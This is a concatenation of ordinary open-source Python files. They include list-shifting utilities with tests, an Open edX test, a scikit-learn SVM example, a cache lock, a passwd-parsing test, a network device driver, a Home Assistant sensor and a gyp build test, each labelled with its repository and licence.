>>> shift_to_the_left(self.iterable_list, 1, pad=True, trim=True) [1, 2, 3, 4, 5, 6, 7, 8, 9, 9] >>> shift_to_the_left(self.iterable_list, 1, pad=True, trim=False) [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9] >>> shift_to_the_left(self.iterable_list, 1, pad=False, trim=True) [1, 2, 3, 4, 5, 6, 7, 8, 9] >>> shift_to_the_left(self.iterable_list, 1, pad=True, trim=True) Warning, with pad=False and trim=False, no change applied. 
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9] """ if dist < 0: raise ValueError("Shift distance has to greater or equal than 0.") if pad: if trim: new_array = array[dist:] + [array[-1]] * dist else: new_array = array + [array[-1]] * dist else: if trim: new_array = array[dist:] else: print("Warning, with pad=False and trim=False, no change applied.") new_array = list(array) return new_array def shift_to_the_right(array, dist, pad=True, trim=True): """Shift array to the right. :param array: An iterable object. :type array: iterable object :param dist: how far you want to shift :type disk: int :param pad: pad array[0] to the left. :type pad: boolean (default True) :param trim: trim the last ``#dist`` items. :type trim: boolean (default True) Usage:: >>> array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] >>> shift_to_the_right(self.iterable_list, 1, pad=True, trim=True) [0, 0, 1, 2, 3, 4, 5, 6, 7, 8] >>> shift_to_the_right(self.iterable_list, 1, pad=True, trim=False) [0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9] >>> shift_to_the_right(self.iterable_list, 1, pad=False, trim=True) [0, 1, 2, 3, 4, 5, 6, 7, 8] >>> shift_to_the_right(self.iterable_list, 1, pad=True, trim=True) Warning, with pad=False and trim=False, no change applied. [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] """ if dist < 0: raise ValueError("Shift distance has to greater or equal than 0.") if pad: if trim: new_array = [array[0]] * dist + array[:-dist] else: new_array = [array[0]] * dist + array else: if trim: new_array = array[:-dist] else: print("Warning, with pad=False and trim=False, no change applied.") new_array = list(array) return new_array def count_generator(generator, memory_efficient=True): """Count number of item in generator. memory_efficient=True, 3 times slower, but memory_efficient. memory_efficient=False, faster, but cost more memory. 
""" if memory_efficient: counter = 0 for _ in generator: counter += 1 return counter else: return len(list(generator)) if __name__ == "__main__": from angora.gadget.pytimer import Timer import time import unittest timer = Timer() class IterToolsUnittest(unittest.TestCase): def setUp(self): """ self.iterable_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] self.iterable_set = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9} self.iterable_dict = {1: 'A', 2: 'B', 3: 'C', 4: 'D', 5: 'E', 6: 'F', 7: 'G', 8: 'H', 9: 'I', 10: 'J',} """ self.iterable_generator = range(10) self.iterable_list = list(range(10)) self.iterable_set = set(list(range(10))) self.iterable_dict = {i: chr(j) for i, j in zip(range(1, 11), range(65, 75))} def test_take(self): self.assertEqual(take(5, self.iterable_generator), [0, 1, 2, 3, 4]) self.assertEqual(take(5, self.iterable_list), [0, 1, 2, 3, 4]) self.assertEqual(take(5, self.iterable_set), [0, 1, 2, 3, 4]) self.assertEqual(take(5, self.iterable_dict), [1, 2, 3, 4, 5]) def test_flatten_functionality(self): iterable = [[0, 1], [2, 3]] self.assertListEqual(list(flatten(iterable)), list(range(4))) def test_flatten_performance(self): complexity = 1000 iterable = [list(range(complexity))] * complexity st = time.clock() for _ in flatten(iterable): pass elapse_flatten = time.clock()- st st = time.clock() for chunk in iterable: for _ in chunk: pass elapse_double_loop = time.clock()- st self.assertGreater(elapse_flatten, elapse_double_loop) def test_flatten_all_functionality(self): iterable = [[0, 1], [2, 3, [4, 5], [6, 7, 8]], [9,]] self.assertListEqual(list(flatten_all(iterable)), list(range(10))) def test_nth(self): self.assertEqual(nth(self.iterable_list, 5), 5) self.assertEqual(nth(self.iterable_list, 100), None) def test_shuffled(self): self.assertNotEqual(shuffled(self.iterable_list), self.iterable_list) def test_grouper(self): self.assertEqual( list(grouper(self.iterable_list, 3, 1024)), [(0, 1, 2), (3, 4, 5), (6, 7, 8), (9, 1024, 1024)], ) def test_grouper_list(self): 
self.assertEqual( list(grouper_list(self.iterable_list, 3)), [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]], ) def test_grouper_dict(self): self.assertEqual( list(grouper_dict(self.iterable_dict, 3)), [ {1: 'A', 2: 'B', 3: 'C'}, {4: 'D', 5: 'E', 6: 'F'}, {7: 'G', 8: 'H', 9: 'I'}, {10: 'J'} ], ) def test_running_windows(self): self.assertEqual( list(running_windows([1,2,3,4,5], 3)), [[1, 2, 3], [2, 3, 4], [3, 4, 5]], ) def test_cycle_running_windows(self): self.assertEqual( list(cycle_running_windows([1,2,3,4,5], 3)), [[1, 2, 3], [2, 3, 4], [3, 4, 5], [4, 5, 1], [5, 1, 2]], ) def test_cycle_slice(self): self.assertEqual( list(cycle_slice(self.iterable_list, 4, 7)), [4,5,6,7], ) self.assertEqual( list(cycle_slice(self.iterable_list, 8, 2)), [8,9,0,1,2], ) def test_cycle_dist(self): self.assertEqual(cycle_dist(5, 13, 24), 8) self.assertEqual(cycle_dist(1, 23, 24), 2) self.assertAlmostEqual(cycle_dist(0.0, 2.4, 1.0), 0.4, delta=0.0001) self.assertAlmostEqual(cycle_dist(0.0, 2.6, 1.0), 0.4, delta=0.0001) def test_padding_left_shift(self): self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=True, trim=True), [1, 2, 3, 4, 5, 6, 7, 8, 9, 9], ) self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=True, trim=False), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9], ) self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=False, trim=True), [1, 2, 3, 4, 5, 6, 7, 8, 9], ) def test_shift_to_the_left(self): self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=True, trim=True), [1, 2, 3, 4, 5, 6, 7, 8, 9, 9], ) self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=True, trim=False), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9], ) self.assertEqual( shift_to_the_left(self.iterable_list, 1, pad=False, trim=True), [1, 2, 3, 4, 5, 6, 7, 8, 9], ) def test_shift_to_the_right(self): self.assertEqual( shift_to_the_right(self.iterable_list, 1, pad=True, trim=True), [0, 0, 1, 2, 3, 4, 5, 6, 7, 8], ) self.assertEqual( shift_to_the_right(self.iterable_list, 1, pad=True, 
trim=False), [0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9], ) self.assertEqual( shift_to_the_right(self.iterable_list, 1, pad=False, trim=True), [0, 1, 2, 3, 4, 5, 6, 7, 8], ) def test_count_generator(self): self.assertEqual(count_generator(self.iterable_generator), 10) unittest.main() def test_flatten_performance(): """测试flatten的性能 flatten()本应该要比二重循环性能好, 但是似乎没能达到。 """ print("{:=^40}".format("test flatten()")) complexity = 1000 iterable = [list(range(complexity))] * complexity st = time.clock() for _ in flatten(iterable): pass print("fatten() method takes %.6f second" % (time.clock() - st)) st = time.clock() for chunk in iterable: for _ in chunk: pass print("double for loop method takes %.6f second" % (time.clock() - st)) # test_flatten_performance() def test_flatten_all_performance(): """测试flatten_all的性能。 flatten_all()虽然更方便一些, 但是性能上是不如根据已知的结构, 用多重 for loop循环来的好。 """ print("{:=^40}".format("test flatten_all()")) complexity = 100 a = [[[1] * complexity] * complexity] * complexity st = time.clock() for _ in flatten_all(a): pass print("fatten_all() method takes %.6f second" % (time.clock() - st)) st = time.clock() for l1 in a: for l2 in l1: for _ in l2: pass print("nested for loop method takes %.6f second" % (time.clock() - st)) # test_flatten_all_performance() def test_nth_performance(): """测试nth的性能。 对于只定义了__iter__而没有定义__getitem__方法的对象, nth()是比较合适的 做法。当然速度完全比不上list自带的索引方法list[i]。 """ print("{:=^40}".format("test nth()")) n = 10000 array = [i for i in range(n)] st = time.clock() for i in range(n): _ = array[i] print("iterable[i] method %.6f second" % (time.clock() - st)) st = time.clock() for i in range(n): _ = nth(array, i) print("nth(iterable, i) method %.6f second" % (time.clock() - st)) st = time.clock() for i in array: _ = i print("build-in for loop method %.6f second" % (time.clock() - st)) # test_nth_performance() def test_count_generator_performance(): """测试count_generator()的性能。 """ def number_generator(): for i in range(1000 * 1000): yield i print("{:=^40}".format("test 
count_generator()")) timer.start() count_generator(number_generator(), memory_efficient=True) print("memory_efficient way takes %s second" % timer.stop()) timer.start() count_generator(number_generator(), memory_efficient=False) print("non-memory_efficient way takes %s second" % timer.stop()) # test_count_generator_performance()
mit
Edraak/edraak-platform
lms/djangoapps/courseware/tests/test_course_tools.py
13
4261
""" Unit tests for course tools. """ import crum import datetime from mock import patch from nose.plugins.attrib import attr import pytz from django.test import RequestFactory from course_modes.models import CourseMode from course_modes.tests.factories import CourseModeFactory from courseware.course_tools import VerifiedUpgradeTool from courseware.models import DynamicUpgradeDeadlineConfiguration from openedx.core.djangoapps.content.course_overviews.models import CourseOverview from openedx.core.djangoapps.schedules.config import CREATE_SCHEDULE_WAFFLE_FLAG from openedx.core.djangoapps.site_configuration.tests.factories import SiteFactory from openedx.core.djangoapps.waffle_utils.testutils import override_waffle_flag from student.tests.factories import CourseEnrollmentFactory, UserFactory from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase from xmodule.modulestore.tests.factories import CourseFactory @attr(shard=3) class VerifiedUpgradeToolTest(SharedModuleStoreTestCase): @classmethod def setUpClass(cls): super(VerifiedUpgradeToolTest, cls).setUpClass() cls.now = datetime.datetime.now(pytz.UTC) cls.course = CourseFactory.create( org='edX', number='test', display_name='Test Course', self_paced=True, start=cls.now - datetime.timedelta(days=30), ) cls.course_overview = CourseOverview.get_from_id(cls.course.id) @override_waffle_flag(CREATE_SCHEDULE_WAFFLE_FLAG, True) def setUp(self): super(VerifiedUpgradeToolTest, self).setUp() self.course_verified_mode = CourseModeFactory( course_id=self.course.id, mode_slug=CourseMode.VERIFIED, expiration_datetime=self.now + datetime.timedelta(days=30), ) patcher = patch('openedx.core.djangoapps.schedules.signals.get_current_site') mock_get_current_site = patcher.start() self.addCleanup(patcher.stop) mock_get_current_site.return_value = SiteFactory.create() DynamicUpgradeDeadlineConfiguration.objects.create(enabled=True) self.enrollment = CourseEnrollmentFactory( course_id=self.course.id, 
mode=CourseMode.AUDIT, course=self.course_overview, ) self.request = RequestFactory().request() self.request.user = self.enrollment.user crum.set_current_request(self.request) def test_tool_visible(self): self.assertTrue(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_no_enrollment_exists(self): self.enrollment.delete() request = RequestFactory().request() request.user = UserFactory() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_using_deadline_from_course_mode(self): DynamicUpgradeDeadlineConfiguration.objects.create(enabled=False) self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_enrollment_is_inactive(self): self.enrollment.is_active = False self.enrollment.save() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_already_verified(self): self.enrollment.mode = CourseMode.VERIFIED self.enrollment.save() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_no_verified_track(self): self.course_verified_mode.delete() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_course_deadline_has_passed(self): self.course_verified_mode.expiration_datetime = self.now - datetime.timedelta(days=1) self.course_verified_mode.save() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id)) def test_not_visible_when_course_mode_has_no_deadline(self): self.course_verified_mode.expiration_datetime = None self.course_verified_mode.save() self.assertFalse(VerifiedUpgradeTool().is_enabled(self.request, self.course.id))
agpl-3.0
lin-credible/scikit-learn
examples/svm/plot_svm_scale_c.py
223
5375
""" ============================================== Scaling the regularization parameter for SVCs ============================================== The following example illustrates the effect of scaling the regularization parameter when using :ref:`svm` for :ref:`classification <svm_classification>`. For SVC classification, we are interested in a risk minimization for the equation: .. math:: C \sum_{i=1, n} \mathcal{L} (f(x_i), y_i) + \Omega (w) where - :math:`C` is used to set the amount of regularization - :math:`\mathcal{L}` is a `loss` function of our samples and our model parameters. - :math:`\Omega` is a `penalty` function of our model parameters If we consider the loss function to be the individual error per sample, then the data-fit term, or the sum of the error for each sample, will increase as we add more samples. The penalization term, however, will not increase. When using, for example, :ref:`cross validation <cross_validation>`, to set the amount of regularization with `C`, there will be a different amount of samples between the main problem and the smaller problems within the folds of the cross validation. Since our loss function is dependent on the amount of samples, the latter will influence the selected value of `C`. The question that arises is `How do we optimally adjust C to account for the different amount of training samples?` The figures below are used to illustrate the effect of scaling our `C` to compensate for the change in the number of samples, in the case of using an `l1` penalty, as well as the `l2` penalty. l1-penalty case ----------------- In the `l1` case, theory says that prediction consistency (i.e. that under given hypothesis, the estimator learned predicts as well as a model knowing the true distribution) is not possible because of the bias of the `l1`. It does say, however, that model consistency, in terms of finding the right set of non-zero parameters as well as their signs, can be achieved by scaling `C1`. 
l2-penalty case ----------------- The theory says that in order to achieve prediction consistency, the penalty parameter should be kept constant as the number of samples grow. Simulations ------------ The two figures below plot the values of `C` on the `x-axis` and the corresponding cross-validation scores on the `y-axis`, for several different fractions of a generated data-set. In the `l1` penalty case, the cross-validation-error correlates best with the test-error, when scaling our `C` with the number of samples, `n`, which can be seen in the first figure. For the `l2` penalty case, the best result comes from the case where `C` is not scaled. .. topic:: Note: Two separate datasets are used for the two different plots. The reason behind this is the `l1` case works better on sparse data, while `l2` is better suited to the non-sparse case. """ print(__doc__) # Author: Andreas Mueller <amueller@ais.uni-bonn.de> # Jaques Grobler <jaques.grobler@inria.fr> # License: BSD 3 clause import numpy as np import matplotlib.pyplot as plt from sklearn.svm import LinearSVC from sklearn.cross_validation import ShuffleSplit from sklearn.grid_search import GridSearchCV from sklearn.utils import check_random_state from sklearn import datasets rnd = check_random_state(1) # set up dataset n_samples = 100 n_features = 300 # l1 data (only 5 informative features) X_1, y_1 = datasets.make_classification(n_samples=n_samples, n_features=n_features, n_informative=5, random_state=1) # l2 data: non sparse, but less features y_2 = np.sign(.5 - rnd.rand(n_samples)) X_2 = rnd.randn(n_samples, n_features / 5) + y_2[:, np.newaxis] X_2 += 5 * rnd.randn(n_samples, n_features / 5) clf_sets = [(LinearSVC(penalty='l1', loss='squared_hinge', dual=False, tol=1e-3), np.logspace(-2.3, -1.3, 10), X_1, y_1), (LinearSVC(penalty='l2', loss='squared_hinge', dual=True, tol=1e-4), np.logspace(-4.5, -2, 10), X_2, y_2)] colors = ['b', 'g', 'r', 'c'] for fignum, (clf, cs, X, y) in enumerate(clf_sets): # set up the 
plot for each regressor plt.figure(fignum, figsize=(9, 10)) for k, train_size in enumerate(np.linspace(0.3, 0.7, 3)[::-1]): param_grid = dict(C=cs) # To get nice curve, we need a large number of iterations to # reduce the variance grid = GridSearchCV(clf, refit=False, param_grid=param_grid, cv=ShuffleSplit(n=n_samples, train_size=train_size, n_iter=250, random_state=1)) grid.fit(X, y) scores = [x[1] for x in grid.grid_scores_] scales = [(1, 'No scaling'), ((n_samples * train_size), '1/n_samples'), ] for subplotnum, (scaler, name) in enumerate(scales): plt.subplot(2, 1, subplotnum + 1) plt.xlabel('C') plt.ylabel('CV Score') grid_cs = cs * float(scaler) # scale the C's plt.semilogx(grid_cs, scores, label="fraction %.2f" % train_size) plt.title('scaling=%s, penalty=%s, loss=%s' % (name, clf.penalty, clf.loss)) plt.legend(loc="best") plt.show()
bsd-3-clause
dannyboi104/SickRage
lib/dogpile/core/dogpile.py
59
5640
import time
import logging

log = logging.getLogger(__name__)


class NeedRegenerationException(Exception):
    """An exception that when raised in the 'with' block,
    forces the 'has_value' flag to False and incurs a
    regeneration of the value.

    """

NOT_REGENERATED = object()


class Lock(object):
    """Dogpile lock class.

    Provides an interface around an arbitrary mutex
    that allows one thread/process to be elected as
    the creator of a new value, while other threads/processes
    continue to return the previous version
    of that value.

    .. versionadded:: 0.4.0
        The :class:`.Lock` class was added as a single-use object
        representing the dogpile API without dependence on
        any shared state between multiple instances.

    :param mutex: A mutex object that provides
     ``acquire()`` and ``release()`` methods.
    :param creator: Callable which returns a tuple of the form
     (new_value, creation_time).  "new_value" should be a newly
     generated value representing completed state.  "creation_time"
     should be a floating point time value which is relative to
     Python's ``time.time()`` call, representing the time at
     which the value was created.  This time value should be associated
     with the created value.
    :param value_and_created_fn: Callable which returns
     a tuple of the form (existing_value, creation_time).  This
     basically should return what the last local call to the ``creator()``
     callable has returned, i.e. the value and the creation time,
     which would be assumed here to be from a cache.  If the
     value is not available, the :class:`.NeedRegenerationException`
     exception should be thrown.
    :param expiretime: Expiration time in seconds.  Set to
     ``None`` for never expires.  This timestamp is compared
     to the creation_time result and ``time.time()`` to determine if
     the value returned by value_and_created_fn is "expired".
    :param async_creator: A callable.  If specified, this callable will be
     passed the mutex as an argument and is responsible for releasing the
     mutex after it finishes some asynchronous value creation.  The intent
     is for this to be used to defer invocation of the creator callable
     until some later time.

     .. versionadded:: 0.4.1 added the async_creator argument.

    """

    def __init__(self,
                 mutex,
                 creator,
                 value_and_created_fn,
                 expiretime,
                 async_creator=None,
                 ):
        self.mutex = mutex
        self.creator = creator
        self.value_and_created_fn = value_and_created_fn
        self.expiretime = expiretime
        self.async_creator = async_creator

    def _is_expired(self, createdtime):
        """Return true if the expiration time is reached, or no
        value is available."""

        return not self._has_value(createdtime) or \
            (
                self.expiretime is not None and
                time.time() - createdtime > self.expiretime
            )

    def _has_value(self, createdtime):
        """Return true if the creation function has proceeded
        at least once."""
        return createdtime > 0

    def _enter(self):
        value_fn = self.value_and_created_fn

        try:
            value = value_fn()
            value, createdtime = value
        except NeedRegenerationException:
            log.debug("NeedRegenerationException")
            value = NOT_REGENERATED
            createdtime = -1

        generated = self._enter_create(createdtime)

        if generated is not NOT_REGENERATED:
            generated, createdtime = generated
            return generated
        elif value is NOT_REGENERATED:
            # a concurrent thread should have just regenerated;
            # re-read through the value function.
            try:
                value, createdtime = value_fn()
                return value
            except NeedRegenerationException:
                raise Exception("Generation function should "
                                "have just been called by a concurrent "
                                "thread.")
        else:
            return value

    def _enter_create(self, createdtime):

        if not self._is_expired(createdtime):
            return NOT_REGENERATED

        # BUG FIX: the local flag was previously named ``async``, which is
        # a reserved keyword as of Python 3.7 (SyntaxError).
        is_async = False

        if self._has_value(createdtime):
            # a stale value exists; only one thread should regenerate,
            # everyone else keeps serving the old value.
            if not self.mutex.acquire(False):
                log.debug("creation function in progress "
                          "elsewhere, returning")
                return NOT_REGENERATED
        else:
            log.debug("no value, waiting for create lock")
            self.mutex.acquire()

        try:
            log.debug("value creation lock %r acquired" % self.mutex)

            # see if someone created the value already
            try:
                value, createdtime = self.value_and_created_fn()
            except NeedRegenerationException:
                pass
            else:
                if not self._is_expired(createdtime):
                    log.debug("value already present")
                    return value, createdtime
                elif self.async_creator:
                    log.debug("Passing creation lock to async runner")
                    self.async_creator(self.mutex)
                    is_async = True
                    return value, createdtime

            log.debug("Calling creation function")
            created = self.creator()
            return created
        finally:
            # when creation was handed to an async runner, the runner
            # owns the mutex and is responsible for releasing it.
            if not is_async:
                self.mutex.release()
                log.debug("Released creation lock")

    def __enter__(self):
        return self._enter()

    def __exit__(self, type, value, traceback):
        pass
gpl-3.0
michalfita/nis2ldap
tests/test_records_person.py
1
1591
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.

import unittest

import records.person


class TestRecordPerson(unittest.TestCase):
    """Unit tests for ``records.person.produce``.

    Verifies that a colon-separated passwd(5)-style entry is parsed into
    a person record with the expected attribute values.
    """

    def setUp(self):
        pass

    def test_typical_passwd_entry(self):
        # Standard seven-field passwd entry; the GECOS field carries the
        # full name followed by empty room/phone/other sub-fields.
        instance = records.person.produce(
            "bunny:8XvAVu/sWGcZQ:1344:504:Bugs Bunny,,,:/home/bbugs:/bin/bash")
        self.assertEqual(instance.username, "bunny")
        self.assertEqual(instance.uid, 1344)
        self.assertEqual(instance.gid, 504)
        self.assertEqual(instance.firstname, "Bugs")
        self.assertEqual(instance.lastname, "Bunny")
        # No email can be derived from a passwd entry, so the attribute
        # must not exist at all.
        with self.assertRaises(AttributeError):
            instance.email
        self.assertEqual(instance.password, "8XvAVu/sWGcZQ")
        self.assertEqual(instance.home, "/home/bbugs")
        self.assertEqual(instance.shell, "/bin/bash")
        self.assertEqual(instance.gecos, "Bugs Bunny,,,")
        self.assertEqual(instance.phone, "")
        self.assertEqual(instance.room, "")
        self.assertEqual(instance.other, "")
gpl-3.0
ninnux/exscript
src/Exscript/protocols/drivers/junos_erx.py
7
1624
# Copyright (C) 2007-2010 Samuel Abels.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
A driver for devices running Juniper ERX OS.
"""
import re
from Exscript.protocols.drivers.driver import Driver
from Exscript.protocols.drivers.ios import _prompt_re

_user_re = [re.compile(r'[\r\n]User: $')]
_password_re = [re.compile(r'[\r\n](Telnet password:|Password:) $')]
_junos_re = re.compile(r'\bJuniper Networks\b', re.I)


class JunOSERXDriver(Driver):
    """Protocol driver for Juniper ERX OS devices.

    Reuses the IOS prompt pattern and supplies ERX-specific login,
    password, and OS-detection patterns.
    """

    def __init__(self):
        Driver.__init__(self, 'junos_erx')
        self.user_re = _user_re
        self.password_re = _password_re
        self.prompt_re = _prompt_re

    def check_head_for_os(self, string):
        # A 'Juniper Networks' banner is a strong (75/100) indication
        # that this driver applies.
        if _junos_re.search(string):
            return 75
        return 0

    def init_terminal(self, conn):
        # Fix terminal geometry so command output parses predictably.
        conn.execute('terminal length 60')
        conn.execute('terminal width 150')

    def auto_authorize(self, conn, account, flush, bailout):
        conn.send('enable 15\r')
        conn.app_authorize(account, flush, bailout)
gpl-2.0
PetePriority/home-assistant
homeassistant/components/waterfurnace/sensor.py
4
3993
""" Support for Waterfurnace. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/sensor.waterfurnace/ """ from homeassistant.components.sensor import ENTITY_ID_FORMAT from homeassistant.components.waterfurnace import ( DOMAIN as WF_DOMAIN, UPDATE_TOPIC ) from homeassistant.const import TEMP_FAHRENHEIT from homeassistant.core import callback from homeassistant.helpers.entity import Entity from homeassistant.util import slugify class WFSensorConfig: """Water Furnace Sensor configuration.""" def __init__(self, friendly_name, field, icon="mdi:gauge", unit_of_measurement=None): """Initialize configuration.""" self.friendly_name = friendly_name self.field = field self.icon = icon self.unit_of_measurement = unit_of_measurement SENSORS = [ WFSensorConfig("Furnace Mode", "mode"), WFSensorConfig("Total Power", "totalunitpower", "mdi:flash", "W"), WFSensorConfig("Active Setpoint", "tstatactivesetpoint", "mdi:thermometer", TEMP_FAHRENHEIT), WFSensorConfig("Leaving Air", "leavingairtemp", "mdi:thermometer", TEMP_FAHRENHEIT), WFSensorConfig("Room Temp", "tstatroomtemp", "mdi:thermometer", TEMP_FAHRENHEIT), WFSensorConfig("Loop Temp", "enteringwatertemp", "mdi:thermometer", TEMP_FAHRENHEIT), WFSensorConfig("Humidity Set Point", "tstathumidsetpoint", "mdi:water-percent", "%"), WFSensorConfig("Humidity", "tstatrelativehumidity", "mdi:water-percent", "%"), WFSensorConfig("Compressor Power", "compressorpower", "mdi:flash", "W"), WFSensorConfig("Fan Power", "fanpower", "mdi:flash", "W"), WFSensorConfig("Aux Power", "auxpower", "mdi:flash", "W"), WFSensorConfig("Loop Pump Power", "looppumppower", "mdi:flash", "W"), WFSensorConfig("Compressor Speed", "actualcompressorspeed", "mdi:speedometer"), WFSensorConfig("Fan Speed", "airflowcurrentspeed", "mdi:fan"), ] def setup_platform(hass, config, add_entities, discovery_info=None): """Set up the Waterfurnace sensor.""" if discovery_info is None: return sensors = [] client = 
hass.data[WF_DOMAIN] for sconfig in SENSORS: sensors.append(WaterFurnaceSensor(client, sconfig)) add_entities(sensors) class WaterFurnaceSensor(Entity): """Implementing the Waterfurnace sensor.""" def __init__(self, client, config): """Initialize the sensor.""" self.client = client self._name = config.friendly_name self._attr = config.field self._state = None self._icon = config.icon self._unit_of_measurement = config.unit_of_measurement # This ensures that the sensors are isolated per waterfurnace unit self.entity_id = ENTITY_ID_FORMAT.format( 'wf_{}_{}'.format(slugify(self.client.unit), slugify(self._attr))) @property def name(self): """Return the name of the sensor.""" return self._name @property def state(self): """Return the state of the sensor.""" return self._state @property def icon(self): """Return icon.""" return self._icon @property def unit_of_measurement(self): """Return the units of measurement.""" return self._unit_of_measurement @property def should_poll(self): """Return the polling state.""" return False async def async_added_to_hass(self): """Register callbacks.""" self.hass.helpers.dispatcher.async_dispatcher_connect( UPDATE_TOPIC, self.async_update_callback) @callback def async_update_callback(self): """Update state.""" if self.client.data is not None: self._state = getattr(self.client.data, self._attr, None) self.async_schedule_update_ha_state()
apache-2.0
t3wz/mtasa-blue
vendor/google-breakpad/src/tools/gyp/test/rules-rebuild/gyptest-default.py
345
2242
#!/usr/bin/env python

# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""
Verifies that a rule that generates multiple outputs rebuilds
correctly when the inputs change.
"""

import TestGyp

test = TestGyp.TestGyp(workdir='workarea_default')

test.run_gyp('same_target.gyp', chdir='src')

test.relocate('src', 'relocate/src')

test.build('same_target.gyp', chdir='relocate/src')

expect = """\
Hello from main.c
Hello from prog1.in!
Hello from prog2.in!
"""

test.run_built_executable('program', chdir='relocate/src', stdout=expect)

test.up_to_date('same_target.gyp', 'program', chdir='relocate/src')

# Modify the first input; only prog1's output should change.
test.sleep()
contents = test.read(['relocate', 'src', 'prog1.in'])
contents = contents.replace('!', ' AGAIN!')
test.write(['relocate', 'src', 'prog1.in'], contents)

test.build('same_target.gyp', chdir='relocate/src')

expect = """\
Hello from main.c
Hello from prog1.in AGAIN!
Hello from prog2.in!
"""

test.run_built_executable('program', chdir='relocate/src', stdout=expect)

test.up_to_date('same_target.gyp', 'program', chdir='relocate/src')

# Modify the second input; both regenerated outputs should now differ.
test.sleep()
contents = test.read(['relocate', 'src', 'prog2.in'])
contents = contents.replace('!', ' AGAIN!')
test.write(['relocate', 'src', 'prog2.in'], contents)

test.build('same_target.gyp', chdir='relocate/src')

expect = """\
Hello from main.c
Hello from prog1.in AGAIN!
Hello from prog2.in AGAIN!
"""

test.run_built_executable('program', chdir='relocate/src', stdout=expect)

test.up_to_date('same_target.gyp', 'program', chdir='relocate/src')

# Test that modifying a rule's inputs (specifically, make-sources.py) causes
# the targets to be built.

test.sleep()
contents = test.read(['relocate', 'src', 'make-sources.py'])
contents = contents.replace('%s', 'the amazing %s')
test.write(['relocate', 'src', 'make-sources.py'], contents)

test.build('same_target.gyp', chdir='relocate/src')

expect = """\
Hello from main.c
Hello from the amazing prog1.in AGAIN!
Hello from the amazing prog2.in AGAIN!
"""

test.run_built_executable('program', chdir='relocate/src', stdout=expect)

test.up_to_date('same_target.gyp', 'program', chdir='relocate/src')

test.pass_test()
gpl-3.0
mdworks2016/work_development
Python/05_FirstPython/Chapter9_WebApp/fppython_develop/lib/python3.7/site-packages/pip/_vendor/distlib/_backport/sysconfig.py
54
26964
# -*- coding: utf-8 -*- # # Copyright (C) 2012 The Python Software Foundation. # See LICENSE.txt and CONTRIBUTORS.txt. # """Access to Python's configuration information.""" import codecs import os import re import sys from os.path import pardir, realpath try: import configparser except ImportError: import ConfigParser as configparser __all__ = [ 'get_config_h_filename', 'get_config_var', 'get_config_vars', 'get_makefile_filename', 'get_path', 'get_path_names', 'get_paths', 'get_platform', 'get_python_version', 'get_scheme_names', 'parse_config_h', ] def _safe_realpath(path): try: return realpath(path) except OSError: return path if sys.executable: _PROJECT_BASE = os.path.dirname(_safe_realpath(sys.executable)) else: # sys.executable can be empty if argv[0] has been changed and Python is # unable to retrieve the real program name _PROJECT_BASE = _safe_realpath(os.getcwd()) if os.name == "nt" and "pcbuild" in _PROJECT_BASE[-8:].lower(): _PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir)) # PC/VS7.1 if os.name == "nt" and "\\pc\\v" in _PROJECT_BASE[-10:].lower(): _PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir)) # PC/AMD64 if os.name == "nt" and "\\pcbuild\\amd64" in _PROJECT_BASE[-14:].lower(): _PROJECT_BASE = _safe_realpath(os.path.join(_PROJECT_BASE, pardir, pardir)) def is_python_build(): for fn in ("Setup.dist", "Setup.local"): if os.path.isfile(os.path.join(_PROJECT_BASE, "Modules", fn)): return True return False _PYTHON_BUILD = is_python_build() _cfg_read = False def _ensure_cfg_read(): global _cfg_read if not _cfg_read: from ..resources import finder backport_package = __name__.rsplit('.', 1)[0] _finder = finder(backport_package) _cfgfile = _finder.find('sysconfig.cfg') assert _cfgfile, 'sysconfig.cfg exists' with _cfgfile.as_stream() as s: _SCHEMES.readfp(s) if _PYTHON_BUILD: for scheme in ('posix_prefix', 'posix_home'): _SCHEMES.set(scheme, 'include', '{srcdir}/Include') _SCHEMES.set(scheme, 'platinclude', 
